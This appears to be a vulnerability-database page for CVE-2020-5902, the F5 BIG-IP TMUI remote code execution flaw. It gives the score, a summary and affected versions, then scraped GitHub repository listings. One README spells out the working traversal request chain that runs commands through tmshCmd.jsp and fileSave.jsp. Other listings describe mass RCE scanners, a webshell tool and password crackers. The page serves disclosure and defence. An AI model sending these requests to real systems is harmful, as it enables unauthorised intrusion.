10
CVSSv2

CVE-2020-5902

Published: 01/07/2020 Updated: 07/08/2020
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

F5 BIG-IP could allow a remote malicious user to execute arbitrary code on the system, caused by a flaw in the Traffic Management User Interface (TMUI). By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Vulnerability Trend

Affected Products

Vendor Product Versions
F5Big-ip Access Policy Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.2, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Advanced Firewall Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Analytics11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Application Acceleration Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Application Security Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Domain Name System11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Fraud Protection Service11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Global Traffic Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Link Controller11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Local Traffic Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2
F5Big-ip Policy Enforcement Manager11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1
F5Ssl Orchestrator14.1.2, 15.0.1

Mailing Lists

F5 Big-IP versions 1313 Build 006 and below suffer from a local file inclusion vulnerability ...

Github Repositories

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit tom0li committed 57368c0 3 minutes ago … Create README.md Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Create README.md 3 minutes ago View code README.md CVE-2020-5902 RCE /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/WWWWW Orange Tsai-Breaking-Parser-Logic https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf About CVE-2020-5902 Topics f5 cve-2020-5902 Resources Readme

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit lijiaxing1997 committed 08a6dd1 8 minutes ago … Merge branch 'master' of https://github.com/lijiaxing1997/CVE-2020-59… …02-POC-EXP wait..# Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 11 minutes ago f5_ip.txt CVE-2020-5902 10 minutes ago f5_rce.py CVE-2020-5902 10 minutes ago View code README.md CVE-2020-5902-POC-EXP 批量扫描CVE-2020-5902,远程代码执行,已测试 About 批量扫描CVE-2020-5902,远程代码执行,已测试 Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit rjouhann committed 99a2561 1 minute ago add script CVE-2020-5902 Git stats 213 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time f5-bigiq-SSLcertKeyCRLimportTool update typo 3 months ago f5-bigiq-TMUI-RCE-vulnerability-CVE-2020-5902 add script CVE-2020-5902 1 minute ago f5-bigiq-as3-rpm-update v1.2 3 months ago f5-bigiq-branchRuleManager update typo 3 months ago f5-bigiq-connectivityChecks Remove DCD to DCD ports 28015 and 29015 as it's for 6.1 18 days ago f5-bigiq-do-rpm-update add script to update DO on BIG-IQ 2 months ago f5-bigiq-licenseUtilityReport update typo 3 months ago f5-bigiq-sanitizeUsageReport update typo 3 months ago f5-bigiq-syncSharedAFMobjectsTool update typo 3 months ago README.md add script CVE-2020-5902 1 minute ago View code README.md F5 BIG-IQ Product Management Team: Tools This GitHub Repository is managed by the F5 BIG-IQ Product Management Team. Bugs and Requests for enhancements can be made by opening an Issue within the repository. Tools Description f5-bigiq-TMUI-RCE-vulnerability-CVE-2020-5902 This script will help you to mitigate CVE-2020-5902 using Script Management feature on BIG-IQ. Check K54909607 for more details. f5-bigiq-as3-rpm-update This script will help you to update AS3 on BIG-IQ. Check K54909607 for more details. f5-bigiq-do-rpm-update This script will help you to update DO on BIG-IQ. Check K54909607 for more details. f5-bigiq-connectivityChecks This script will run a sequence checks to verify connectivity between BIG-IQ CM, DCD and BIG-IPs. f5-bigiq-SSLcertKeyCRLimportTool Automate import of SSL Cert, Key & CRL from BIG-IP to BIG-IQ./!\ This feature is available in BIG-IQ 7.0 /!\ f5-bigiq-licenseUtilityReport Utility Billing Report - Generate a usage report for your utility license(s) and provide to F5 Networks Inc. for billing purposes./!\ This feature is available in BIG-IQ 6.1 /!\ f5-bigiq-f5sanitizeUsageReport Script to obfuscated IP/MAC addresses and Hostnames from a BIG-IQ JSON report./!\ This feature is available in BIG-IQ 6.1 /!\ f5-bigiq-syncSharedAFMobjectsTool Script to export AFM objects (port lists, address lists, rule lists, policies and policy rules) from 1 BIG-IQ to another. f5-bigiq-branchRuleManager This script will allow you to set advanced expression for branch rules in access policies (per-session and per-request). About BIG-IQ Product Management Team Repository Topics big-iq api-rest scripts bash license Resources Readme Releases No releases published Contributors 2 rjouhann rjouhann focrensh focrensh Languages Shell 51.4% Python 26.7% Perl 21.9%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit qiong-qi committed eebf55f 4 minutes ago Create README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py 批量检测CVE-2020-5902 8 minutes ago README.md Create README.md 4 minutes ago View code README.md CVE-2020-5902-POC 批量检测CVE-2020-5902 python3 CVE-2020-5902.py infile.txt About 批量检测CVE-2020-5902 Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit theLSA committed 17f70f9 7 minutes ago first commit lcl Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time batch_result/20200708103305 first commit lcl 5 minutes ago hsqldb_auth_bypass_batch_result/20200709162928 first commit lcl 5 minutes ago img first commit lcl 5 minutes ago 1-2-f5.txt first commit lcl 5 minutes ago LICENSE Initial commit 10 minutes ago README.md Initial commit 10 minutes ago f5-bigip-rce-cve-2020-5902.py first commit lcl 5 minutes ago View code README.md f5-bigip-rce-cve-2020-5902 f5-bigip-rce-cve-2020-5902 About f5-bigip-rce-cve-2020-5902 Resources Readme License MIT License Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit cybersecurityworks553 committed fb94c84 2 minutes ago … Update README.md Git stats 8 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 2 minutes ago Sample-Input-ip.txt Create Sample-Input-ip.txt 6 minutes ago Scanner_CVE-2020-5902.py Update Scanner_CVE-2020-5902.py 7 minutes ago View code README.md Scanner CVE-2020-5902 Script will run checks for CVE-2020-5902 Usage: Provide list of IP address in "ip.txt" to scan for CVE-2020-5902 Default port: 443 Sample Output [+] Host is vulnerable to CVE-2020-5902:[IP Address] [+] Host is not vulnerable to CVE-2020-5902:[IP Address] About CVE-2020-5902 scanner Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit root committed 6e27fda 3 minutes ago … CVE-2020-5902 Git stats 27 commits 1 branch 1 tag Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md CVE-2020-5902 3 minutes ago f5-big-ip-scan.go CVE-2020-5902 3 minutes ago gettitle.go up gettitle 3 months ago inspur.go inspur密码破解 4 months ago mpvpn.go phpstudybackdoorscan 2 months ago phpstudy_getshell.go CVE-2020-5902 3 minutes ago phpstudybackdoorscan.go phpstudybackdoorscan 2 months ago pocstest.go update 3 months ago View code README.md mpvpn.go 迈普VPN密码破解工具 inspur.go inspur(浪潮)服务器密码破解工具 nessustoexcle(计划中) nessus扫描结果转excle SqlInjectionFuzz(计划中) sql注入fuzz工具 GetTitle 不是很完善,凑合用吧先 网站状态码和title获取 poctest 一个简陋的poc测试工具 xssscan(计划中) xss扫描工具 phpstudy_getshell phpstudy后门写入webshell工具 phpstudybackdoorscan phpstudy后门批量扫描 shiroKEYcheck Apache shiro KEY 破解 f5-big-ip-scan F5-BIG-IP漏洞扫描CVE-2020-5902 About 一些小工具 Resources Readme Releases 1 phpstudy_getshell for linux Latest on May 4 Contributors 2 shigophilo shigophilo Languages Go 100.0%

